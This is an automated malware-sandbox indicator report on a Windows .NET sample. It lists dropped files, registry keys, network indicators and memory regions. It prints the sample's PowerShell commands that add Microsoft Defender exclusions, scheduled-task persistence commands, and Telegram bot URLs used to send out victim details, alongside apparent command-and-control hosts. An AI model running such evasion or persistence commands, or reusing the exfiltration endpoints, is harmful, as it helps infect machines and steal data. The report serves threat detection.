IOC Report
b5Tu0LaQfn6bnAD.exe

loading gifFilesProcessesURLsDomainsIPsRegistryMemdumps8642010010Label

Files

File Path
Type
Category
Malicious
Download
b5Tu0LaQfn6bnAD.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\b5Tu0LaQfn6bnAD.exe.log
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\tmp1110.tmp
XML 1.0 document, ASCII text
dropped
malicious
C:\Users\user\AppData\Roaming\IFZCSslt.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\IFZCSslt.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IFZCSslt.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jwitit4.g4x.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20r33ymh.q5i.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_apx3zdnh.glp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hcbwxpaf.hmp.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iflxd2zx.zmm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_maba3avc.moh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oogfb4gm.mid.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zs3yae1o.o3y.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\tmp265D.tmp
XML 1.0 document, ASCII text
dropped
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\b5Tu0LaQfn6bnAD.exe
"C:\Users\user\Desktop\b5Tu0LaQfn6bnAD.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\b5Tu0LaQfn6bnAD.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\IFZCSslt.exe"
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IFZCSslt" /XML "C:\Users\user\AppData\Local\Temp\tmp1110.tmp"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
malicious
C:\Users\user\AppData\Roaming\IFZCSslt.exe
C:\Users\user\AppData\Roaming\IFZCSslt.exe
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IFZCSslt" /XML "C:\Users\user\AppData\Local\Temp\tmp265D.tmp"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://www.fontbureau.com/designersG
unknown
https://duckduckgo.com/ac/?q=
unknown
http://www.fontbureau.com/designers/?
unknown
http://www.founder.com.cn/cn/bThe
unknown
https://api.telegram.org
unknown
https://api.telegram.org/bot
unknown
http://www.fontbureau.com/designers?
unknown
https://www.office.com/lB
unknown
http://www.tiro.com
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
http://www.fontbureau.com/designers
unknown
https://chrome.google.com/webstore?hl=en
unknown
http://varders.kozow.com:8081
unknown
http://www.sajatypeworks.com
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20a
unknown
http://www.typography.netD
unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico
unknown
http://www.founder.com.cn/cn/cThe
unknown
https://www.office.com/x
unknown
http://www.galapagosdesign.com/staff/dennis.htm
unknown
http://checkip.dyndns.org/
193.122.6.168
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
http://checkip.dyndns.org/q
unknown
https://chrome.google.com/webstore?hl=enlB
unknown
http://reallyfreegeoip.org
unknown
http://www.galapagosdesign.com/DPlease
unknown
https://api.telegram
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2027/03/2025%20/%2022:31:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://reallyfreegeoip.org/xml/45.92.229.138
104.21.112.1
http://www.fonts.com
unknown
http://checkip.dyndns.com
unknown
http://www.urwpp.deDPlease
unknown
http://www.zhongyicts.com.cn
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.sakkal.com
unknown
https://reallyfreegeoip.org/xml/
unknown
https://www.office.com/
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://www.fontbureau.com
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://ac.ecosia.org?q=
unknown
http://checkip.dyndns.org
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:302494%0D%0ADate%20and%20Time:%2028/03/2025%20/%2001:09:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20302494%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D
149.154.167.220
https://chrome.google.com/webstore?hl=en4
unknown
https://reallyfreegeoip.org/xml/45.92.229.138$
unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=
unknown
http://www.carterandcone.coml
unknown
http://aborters.duckdns.org:8081
unknown
http://www.fontbureau.com/designers/cabarga.htmlN
unknown
http://www.founder.com.cn/cn
unknown
https://www.ecosia.org/newtab/v20
unknown
http://www.fontbureau.com/designers/frere-user.html
unknown
https://www.office.com/4
unknown
http://anotherarmy.dns.army:8081
unknown
https://duckduckgo.com/chrome_newtabv20
unknown
http://www.jiyu-kobo.co.jp/
unknown
https://reallyfreegeoip.org
unknown
http://www.fontbureau.com/designers8
unknown
http://api.telegram.org
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://gemini.google.com/app?q=
unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
unknown
There are 52 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
reallyfreegeoip.org
104.21.112.1
api.telegram.org
149.154.167.220
checkip.dyndns.com
193.122.6.168
checkip.dyndns.org
unknown

IPs

IP
Domain
Country
Malicious
149.154.167.220
api.telegram.org
United Kingdom
104.21.112.1
reallyfreegeoip.org
United States
193.122.6.168
checkip.dyndns.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\vbc_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\vbc_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\vbc_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\vbc_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\vbc_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\vbc_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\vbc_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\vbc_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\vbc_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\vbc_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\vbc_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\vbc_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\vbc_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\vbc_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
42EC000
trusted library allocation
page read and write
malicious
68A1000
trusted library allocation
page read and write
malicious
42F000
remote allocation
page execute and read and write
malicious
6A73000
trusted library allocation
page read and write
malicious
4B79000
trusted library allocation
page read and write
malicious
6F31000
trusted library allocation
page read and write
malicious
49A0000
heap
page read and write
BBDD000
stack
page read and write
6FF0000
trusted library allocation
page read and write
80C4000
trusted library allocation
page read and write
68F1000
trusted library allocation
page read and write
91EE000
stack
page read and write
B6DE000
stack
page read and write
6A3A000
trusted library allocation
page read and write
69FE000
trusted library allocation
page read and write
71B4000
trusted library allocation
page read and write
14E3000
trusted library allocation
page execute and read and write
275B000
trusted library allocation
page execute and read and write
4559000
stack
page read and write
95F0000
heap
page read and write
694D000
trusted library allocation
page read and write
146E000
stack
page read and write
50F7000
stack
page read and write
790C000
trusted library allocation
page read and write
5830000
heap
page read and write
3350000
heap
page read and write
78C9000
trusted library allocation
page read and write
792A000
heap
page read and write
45E0000
heap
page read and write
6A03000
trusted library allocation
page read and write
70C4000
trusted library allocation
page read and write
7B32000
trusted library allocation
page read and write
A200000
trusted library allocation
page read and write
6E48000
trusted library allocation
page read and write
9520000
trusted library allocation
page read and write
5200000
heap
page read and write
93B0000
trusted library allocation
page read and write
A340000
trusted library allocation
page execute and read and write
52C0000
trusted library allocation
page read and write
6B33000
trusted library allocation
page read and write
A1EF000
stack
page read and write
A61E000
heap
page read and write
6F8D000
trusted library allocation
page read and write
A1F6000
trusted library allocation
page read and write
BE5D000
stack
page read and write
6E6E000
stack
page read and write
69AC000
trusted library allocation
page read and write
42E000
remote allocation
page execute and read and write
BED000
stack
page read and write
7133000
trusted library allocation
page read and write
3311000
trusted library allocation
page read and write
6608000
trusted library allocation
page read and write
4A07000
trusted library allocation
page execute and read and write
52BD000
trusted library allocation
page execute and read and write
17E6000
trusted library allocation
page execute and read and write
6764000
trusted library allocation
page read and write
3180000
trusted library allocation
page read and write
2D8E000
unkown
page read and write
5418000
heap
page read and write
CCE000
stack
page read and write
6FA3000
trusted library allocation
page read and write
4A02000
trusted library allocation
page read and write
6BA7000
trusted library allocation
page read and write
70E1000
trusted library allocation
page read and write
5210000
heap
page execute and read and write
AC70000
trusted library allocation
page read and write
554E000
stack
page read and write
674D000
trusted library allocation
page read and write
4A37000
heap
page read and write
B10000
heap
page read and write
5CA7000
heap
page read and write
71C6000
trusted library allocation
page read and write
ACF0000
trusted library allocation
page execute and read and write
ABA0000
trusted library allocation
page execute and read and write
4DAA000
stack
page read and write
185E000
stack
page read and write
5550000
trusted library allocation
page execute and read and write
A330000
trusted library allocation
page read and write
7A0B000
trusted library allocation
page read and write
52A3000
trusted library allocation
page execute and read and write
6B2F000
trusted library allocation
page read and write
A8DE000
stack
page read and write
70C2000
trusted library allocation
page read and write
6941000
trusted library allocation
page read and write
6B60000
trusted library allocation
page read and write
94C6000
trusted library allocation
page read and write
6FE0000
trusted library allocation
page read and write
A240000
trusted library allocation
page read and write
81EA000
trusted library allocation
page read and write
340A000
trusted library allocation
page read and write
14F5000
heap
page read and write
54C0000
heap
page read and write
6C10000
trusted library allocation
page read and write
14E4000
trusted library allocation
page read and write
14F0000
heap
page read and write
5290000
heap
page read and write
703E000
stack
page read and write
4E50000
heap
page read and write
1404000
heap
page read and write
8163000
trusted library allocation
page read and write
800D000
trusted library allocation
page read and write
57D0000
trusted library allocation
page read and write
49FA000
trusted library allocation
page execute and read and write
3A89000
trusted library allocation
page read and write
4A67000
heap
page read and write
94CB000
trusted library allocation
page read and write
1365000
heap
page read and write
673E000
trusted library allocation
page read and write
73B0000
trusted library allocation
page read and write
A320000
trusted library allocation
page read and write
899E000
stack
page read and write
5560000
heap
page read and write
2D4E000
unkown
page read and write
94B0000
trusted library allocation
page read and write
8207000
trusted library allocation
page read and write
796B000
heap
page read and write
28A0000
trusted library allocation
page execute and read and write
82D9000
trusted library allocation
page read and write
8D6D000
stack
page read and write
6732000
trusted library allocation
page read and write
6B2A000
trusted library allocation
page read and write
6A3F000
trusted library allocation
page read and write
5C2E000
stack
page read and write
4A00000
trusted library allocation
page read and write
7A9E000
stack
page read and write
2752000
trusted library allocation
page read and write
6FD8000
trusted library allocation
page read and write
E5F000
stack
page read and write
6746000
trusted library allocation
page read and write
7F3B000
trusted library allocation
page read and write
A5E3000
heap
page read and write
7131000
trusted library allocation
page read and write
95E6000
trusted library allocation
page read and write
43F000
remote allocation
page execute and read and write
96A0000
heap
page read and write
A370000
heap
page read and write
ED8000
unkown
page readonly
52D0000
trusted library allocation
page read and write
8DEE000
stack
page read and write
A208000
trusted library allocation
page read and write
C1FC000
stack
page read and write
8186000
trusted library allocation
page read and write
94C0000
trusted library allocation
page read and write
ABB0000
trusted library allocation
page read and write
837D000
heap
page read and write
9BA0000
trusted library allocation
page read and write
7F31000
trusted library allocation
page read and write
6760000
trusted library allocation
page read and write
71EF000
trusted library allocation
page read and write
52B0000
trusted library allocation
page read and write
6C20000
trusted library allocation
page execute and read and write
13D9000
heap
page read and write
7F9B000
trusted library allocation
page read and write
B12000
heap
page read and write
8E00000
heap
page read and write
FD0000
heap
page read and write
2F4D000
stack
page read and write
5DE0000
trusted library allocation
page read and write
C5FF000
stack
page read and write
5760000
trusted library allocation
page read and write
ABF0000
trusted library allocation
page execute and read and write
52E0000
heap
page read and write
7C4B000
trusted library allocation
page read and write
707E000
stack
page read and write
94ED000
trusted library allocation
page read and write
81D8000
trusted library allocation
page read and write
AB9F000
stack
page read and write
EA7000
heap
page read and write
71FA000
trusted library allocation
page read and write
7925000
trusted library allocation
page read and write
A5E5000
heap
page read and write
6949000
trusted library allocation
page read and write
1300000
heap
page read and write
7C17000
trusted library allocation
page read and write
2BC6000
trusted library allocation
page read and write
A2E0000
trusted library allocation
page read and write
A89E000
stack
page read and write
49F0000
trusted library allocation
page read and write
5205000
heap
page read and write
79D0000
trusted library allocation
page read and write
A1F4000
trusted library allocation
page read and write
31F0000
heap
page read and write
6B21000
trusted library allocation
page read and write
52A4000
trusted library allocation
page read and write
A220000
trusted library allocation
page read and write
5C40000
trusted library allocation
page execute and read and write
B0DE000
stack
page read and write
A5E0000
heap
page read and write
2DEE000
stack
page read and write
2A20000
trusted library allocation
page read and write
672E000
trusted library allocation
page read and write
6780000
trusted library allocation
page read and write
BBE0000
heap
page read and write
33BC000
trusted library allocation
page read and write
7FCB000
trusted library allocation
page read and write
960000
heap
page read and write
77B0000
heap
page read and write
4A0B000
trusted library allocation
page execute and read and write
B49D000
stack
page read and write
66A0000
heap
page read and write
9B1E000
stack
page read and write
A25E000
stack
page read and write
9D6E000
stack
page read and write
E96000
trusted library allocation
page execute and read and write
4980000
trusted library allocation
page read and write
AE60000
heap
page read and write
6A52000
trusted library allocation
page read and write
7ADE000
stack
page read and write
7B67000
trusted library allocation
page read and write
A71E000
stack
page read and write
4319000
trusted library allocation
page read and write
A317000
trusted library allocation
page read and write
7A7D000
trusted library allocation
page read and write
54D0000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
94E6000
trusted library allocation
page read and write
82BD000
trusted library allocation
page read and write
B1DE000
stack
page read and write
5510000
trusted library allocation
page read and write
AD0000
heap
page read and write
6918000
trusted library allocation
page read and write
2A70000
heap
page execute and read and write
94DA000
trusted library allocation
page read and write
AF9D000
stack
page read and write
6C30000
trusted library allocation
page read and write
673A000
trusted library allocation
page read and write
6B66000
trusted library allocation
page read and write
57E0000
heap
page execute and read and write
B92000
heap
page read and write
6A2C000
trusted library allocation
page read and write
BB8000
heap
page read and write
7C76000
trusted library allocation
page read and write
BF9D000
stack
page read and write
29FD000
trusted library allocation
page read and write
707E000
trusted library allocation
page read and write
F6A000
stack
page read and write
7AD5000
trusted library allocation
page read and write
81F0000
trusted library allocation
page read and write
6F20000
heap
page execute and read and write
4AF2000
heap
page read and write
5130000
trusted library allocation
page read and write
6C90000
trusted library allocation
page execute and read and write
A85D000
stack
page read and write
4983000
trusted library allocation
page execute and read and write
8F7000
stack
page read and write
2770000
trusted library allocation
page read and write
7D3E000
stack
page read and write
6AA4000
trusted library allocation
page read and write
BF5E000
stack
page read and write
936D000
stack
page read and write
49A5000
heap
page read and write
E92000
trusted library allocation
page read and write
A02E000
stack
page read and write
4B39000
trusted library allocation
page read and write
17DD000
trusted library allocation
page execute and read and write
6F1C000
stack
page read and write
7B61000
trusted library allocation
page read and write
51F0000
heap
page readonly
95E4000
trusted library allocation
page read and write
333E000
unkown
page read and write
A35E000
stack
page read and write
7B79000
trusted library allocation
page read and write
4F83000
heap
page read and write
6FEC000
trusted library allocation
page read and write
30E0000
heap
page read and write
A628000
heap
page read and write
A230000
trusted library allocation
page execute and read and write
3161000
trusted library allocation
page read and write
4990000
trusted library allocation
page read and write
316D000
trusted library allocation
page read and write
6CDE000
stack
page read and write
315E000
trusted library allocation
page read and write
57C0000
heap
page read and write
78A1000
trusted library allocation
page read and write
C6FE000
stack
page read and write
33BE000
stack
page read and write
54CB000
heap
page read and write
2A14000
trusted library allocation
page read and write
A780000
heap
page read and write
1897000
heap
page read and write
AC00000
trusted library allocation
page execute and read and write
523E000
stack
page read and write
B76000
heap
page read and write
53BE000
stack
page read and write
5410000
heap
page read and write
7252000
trusted library allocation
page read and write
349B000
heap
page read and write
B86000
heap
page read and write
6A30000
trusted library allocation
page read and write
8202000
trusted library allocation
page read and write
13D1000
heap
page read and write
95D0000
heap
page execute and read and write
ACA0000
trusted library allocation
page read and write
14ED000
trusted library allocation
page execute and read and write
6BA9000
trusted library allocation
page read and write
AA5E000
stack
page read and write
2A35000
trusted library allocation
page read and write
311C000
stack
page read and write
54F4000
trusted library allocation
page read and write
689E000
stack
page read and write
8E03000
heap
page read and write
71AA000
trusted library allocation
page read and write
722F000
trusted library allocation
page read and write
AF7000
heap
page read and write
4E40000
trusted library allocation
page execute and read and write
BD3E000
stack
page read and write
9D70000
heap
page read and write
5240000
heap
page read and write
83E9000
heap
page read and write
6FA7000
trusted library allocation
page read and write
1402000
heap
page read and write
1810000
trusted library allocation
page read and write
9510000
trusted library allocation
page read and write
5980000
trusted library allocation
page read and write
82A5000
trusted library allocation
page read and write
49F2000
trusted library allocation
page read and write
D4E000
stack
page read and write
5F9000
stack
page read and write
A2E4000
trusted library allocation
page read and write
81E0000
trusted library allocation
page read and write
6B17000
trusted library allocation
page read and write
723A000
trusted library allocation
page read and write
16CE000
stack
page read and write
2DA0000
heap
page read and write
4A65000
heap
page read and write
2A81000
trusted library allocation
page read and write
540C000
stack
page read and write
543A000
heap
page read and write
99DE000
stack
page read and write
4A20000
trusted library allocation
page read and write
6AA2000
trusted library allocation
page read and write
71F4000
trusted library allocation
page read and write
8EB0000
heap
page read and write
A0EE000
stack
page read and write
29BE000
stack
page read and write
FE0000
heap
page read and write
EA0000
heap
page read and write
3359000
trusted library allocation
page read and write
ACB0000
trusted library allocation
page read and write
17F2000
trusted library allocation
page read and write
5504000
heap
page read and write
2AD4000
trusted library allocation
page read and write
52CA000
trusted library allocation
page execute and read and write
A270000
trusted library allocation
page execute and read and write
817B000
trusted library allocation
page read and write
6B54000
trusted library allocation
page read and write
5750000
trusted library allocation
page execute and read and write
A62A000
heap
page read and write
E90000
trusted library allocation
page read and write
ABD0000
trusted library allocation
page read and write
7C2E000
stack
page read and write
7981000
trusted library allocation
page read and write
6909000
trusted library allocation
page read and write
7F53000
trusted library allocation
page read and write
53D0000
heap
page read and write
723D000
trusted library allocation
page read and write
A40000
heap
page read and write
6B5B000
trusted library allocation
page read and write
6F81000
trusted library allocation
page read and write
7971000
heap
page read and write
71BD000
trusted library allocation
page read and write
6720000
trusted library allocation
page read and write
B35B000
stack
page read and write
1870000
trusted library allocation
page read and write
314B000
trusted library allocation
page read and write
14D0000
trusted library allocation
page read and write
AC76000
trusted library allocation
page read and write
6951000
trusted library allocation
page read and write
B09E000
stack
page read and write
441000
remote allocation
page execute and read and write
9DAC000
heap
page read and write
9DA3000
heap
page read and write
81F5000
trusted library allocation
page read and write
E9A000
trusted library allocation
page execute and read and write
810B000
trusted library allocation
page read and write
4F70000
trusted library section
page readonly
2AC9000
trusted library allocation
page read and write
7B73000
trusted library allocation
page read and write
959D000
stack
page read and write
A300000
trusted library allocation
page execute and read and write
81FC000
trusted library allocation
page read and write
6961000
trusted library allocation
page read and write
289B000
stack
page read and write
7A67000
trusted library allocation
page read and write
5770000
trusted library allocation
page read and write
82D7000
trusted library allocation
page read and write
4311000
trusted library allocation
page read and write
17D0000
trusted library allocation
page read and write
803D000
trusted library allocation
page read and write
A280000
trusted library allocation
page execute and read and write
3185000
trusted library allocation
page read and write
AD5E000
stack
page read and write
AD00000
heap
page read and write
8304000
trusted library allocation
page read and write
83F9000
heap
page read and write
797F000
trusted library allocation
page read and write
7FB3000
trusted library allocation
page read and write
94D2000
trusted library allocation
page read and write
7C30000
trusted library section
page read and write
8D00000
heap
page execute and read and write
A20D000
trusted library allocation
page read and write
9504000
trusted library allocation
page read and write
4F30000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
3140000
trusted library allocation
page read and write
7110000
trusted library allocation
page read and write
E12000
unkown
page readonly
6BA1000
trusted library allocation
page read and write
3411000
trusted library allocation
page read and write
4960000
heap
page read and write
B8DE000
stack
page read and write
91EE000
stack
page read and write
70BD000
stack
page read and write
48F7000
stack
page read and write
402000
remote allocation
page execute and read and write
69AA000
trusted library allocation
page read and write
70BC000
trusted library allocation
page read and write
9EAD000
stack
page read and write
440000
remote allocation
page execute and read and write
B9DE000
stack
page read and write
691C000
trusted library allocation
page read and write
A06E000
stack
page read and write
B45C000
stack
page read and write
6726000
trusted library allocation
page read and write
4F50000
trusted library allocation
page execute and read and write
5500000
trusted library allocation
page execute and read and write
9C6D000
stack
page read and write
4F20000
trusted library allocation
page read and write
C2FC000
stack
page read and write
793D000
trusted library allocation
page read and write
45C0000
heap
page read and write
31B0000
trusted library allocation
page read and write
7102000
trusted library allocation
page read and write
AC7A000
trusted library allocation
page read and write
14E0000
trusted library allocation
page read and write
AC10000
trusted library allocation
page execute and read and write
A49E000
stack
page read and write
E8D000
trusted library allocation
page execute and read and write
3420000
heap
page read and write
71C2000
trusted library allocation
page read and write
6FDC000
trusted library allocation
page read and write
7099000
trusted library allocation
page read and write
4F10000
trusted library allocation
page execute and read and write
52DB000
trusted library allocation
page execute and read and write
4B20000
heap
page read and write
29C0000
trusted library allocation
page read and write
422000
remote allocation
page execute and read and write
5843000
heap
page read and write
ADE000
heap
page read and write
B080000
heap
page read and write
7B26000
trusted library allocation
page read and write
7C2F000
trusted library allocation
page read and write
6F98000
trusted library allocation
page read and write
9B9E000
stack
page read and write
552A000
trusted library allocation
page read and write
6FAB000
trusted library allocation
page read and write
17CF000
stack
page read and write
E70000
trusted library allocation
page read and write
52D2000
trusted library allocation
page read and write
ACC0000
trusted library allocation
page read and write
83CC000
heap
page read and write
3166000
trusted library allocation
page read and write
2C14000
trusted library allocation
page read and write
5DD0000
trusted library allocation
page read and write
AA1E000
stack
page read and write
2A40000
trusted library allocation
page read and write
7244000
trusted library allocation
page read and write
ADA000
heap
page read and write
71E8000
trusted library allocation
page read and write
6914000
trusted library allocation
page read and write
70F4000
trusted library allocation
page read and write
79AF000
trusted library allocation
page read and write
AE5D000
stack
page read and write
6A0E000
trusted library allocation
page read and write
4B7D000
stack
page read and write
52D5000
trusted library allocation
page execute and read and write
6BBF000
trusted library allocation
page read and write
8065000
trusted library allocation
page read and write
1860000
trusted library allocation
page execute and read and write
80F5000
trusted library allocation
page read and write
B04000
heap
page read and write
7B5C000
trusted library allocation
page read and write
8359000
heap
page read and write
B5DE000
stack
page read and write
AA9E000
stack
page read and write
95EA000
trusted library allocation
page read and write
C300000
heap
page read and write
7B4A000
trusted library allocation
page read and write
33FF000
stack
page read and write
E7D000
trusted library allocation
page execute and read and write
A206000
trusted library allocation
page read and write
5C60000
heap
page read and write
5C30000
trusted library allocation
page read and write
27BE000
stack
page read and write
2A30000
trusted library allocation
page read and write
6BC3000
trusted library allocation
page read and write
E74000
trusted library allocation
page read and write
6FD0000
trusted library allocation
page read and write
6710000
trusted library allocation
page read and write
6A09000
trusted library allocation
page read and write
2A10000
trusted library allocation
page read and write
5400000
trusted library allocation
page read and write
A55000
heap
page read and write
807B000
trusted library allocation
page read and write
7018000
trusted library allocation
page read and write
902E000
stack
page read and write
7234000
trusted library allocation
page read and write
13C5000
heap
page read and write
32D0000
heap
page read and write
5280000
trusted library allocation
page read and write
337F000
unkown
page read and write
52E5000
heap
page read and write
28B0000
heap
page read and write
D50000
heap
page read and write
A1FA000
trusted library allocation
page read and write
A4DE000
stack
page read and write
6A32000
trusted library allocation
page read and write
5970000
trusted library allocation
page read and write
A210000
trusted library allocation
page execute and read and write
79E0000
trusted library allocation
page execute and read and write
D0E000
stack
page read and write
724D000
trusted library allocation
page read and write
1373000
heap
page read and write
17EA000
trusted library allocation
page execute and read and write
A250000
trusted library allocation
page execute and read and write
B68000
heap
page read and write
8184000
trusted library allocation
page read and write
79ED000
trusted library allocation
page read and write
8099000
trusted library allocation
page read and write
53EE000
stack
page read and write
7AED000
trusted library allocation
page read and write
FAF000
stack
page read and write
9BAD000
trusted library allocation
page read and write
4984000
trusted library allocation
page read and write
6FE4000
trusted library allocation
page read and write
6955000
trusted library allocation
page read and write
3120000
trusted library allocation
page read and write
6FE8000
trusted library allocation
page read and write
E73000
trusted library allocation
page execute and read and write
29DB000
trusted library allocation
page read and write
6BB1000
trusted library allocation
page read and write
17F7000
trusted library allocation
page execute and read and write
4A05000
trusted library allocation
page execute and read and write
6FFF000
stack
page read and write
CA0000
heap
page read and write
499D000
trusted library allocation
page execute and read and write
2F8A000
stack
page read and write
4A5A000
heap
page read and write
6AF0000
heap
page read and write
66EC000
stack
page read and write
94E1000
trusted library allocation
page read and write
79D7000
trusted library allocation
page read and write
9EEF000
stack
page read and write
330E000
stack
page read and write
7F9D000
trusted library allocation
page read and write
54F0000
trusted library allocation
page read and write
6BBA000
trusted library allocation
page read and write
94DE000
trusted library allocation
page read and write
2757000
trusted library allocation
page execute and read and write
6F9B000
trusted library allocation
page read and write
423000
remote allocation
page execute and read and write
3A81000
trusted library allocation
page read and write
13E5000
heap
page read and write
582B000
stack
page read and write
5590000
heap
page read and write
68FE000
trusted library allocation
page read and write
70CF000
trusted library allocation
page read and write
9B5E000
stack
page read and write
6790000
heap
page execute and read and write
6959000
trusted library allocation
page read and write
7257000
trusted library allocation
page read and write
2A16000
trusted library allocation
page read and write
17FB000
trusted library allocation
page execute and read and write
6A8D000
trusted library allocation
page read and write
5C70000
heap
page read and write
29EE000
trusted library allocation
page read and write
52C2000
trusted library allocation
page read and write
A5DE000
stack
page read and write
5520000
trusted library allocation
page read and write
5840000
heap
page read and write
703B000
trusted library allocation
page read and write
B82000
heap
page read and write
A0AE000
stack
page read and write
5134000
trusted library allocation
page read and write
49F6000
trusted library allocation
page execute and read and write
1370000
heap
page read and write
12F7000
stack
page read and write
69EE000
trusted library allocation
page read and write
4E3E000
stack
page read and write
52AD000
trusted library allocation
page execute and read and write
A39D000
stack
page read and write
94CE000
trusted library allocation
page read and write
2A60000
trusted library allocation
page read and write
6D6E000
stack
page read and write
4ED0000
heap
page read and write
3190000
trusted library allocation
page read and write
A66D000
heap
page read and write
AC90000
trusted library allocation
page execute and read and write
5790000
trusted library allocation
page execute and read and write
30EA000
heap
page read and write
8350000
heap
page read and write
6B11000
trusted library allocation
page read and write
9500000
trusted library allocation
page read and write
9A1D000
stack
page read and write
5762000
trusted library allocation
page read and write
32F0000
heap
page read and write
4F2D000
trusted library allocation
page read and write
E80000
trusted library allocation
page read and write
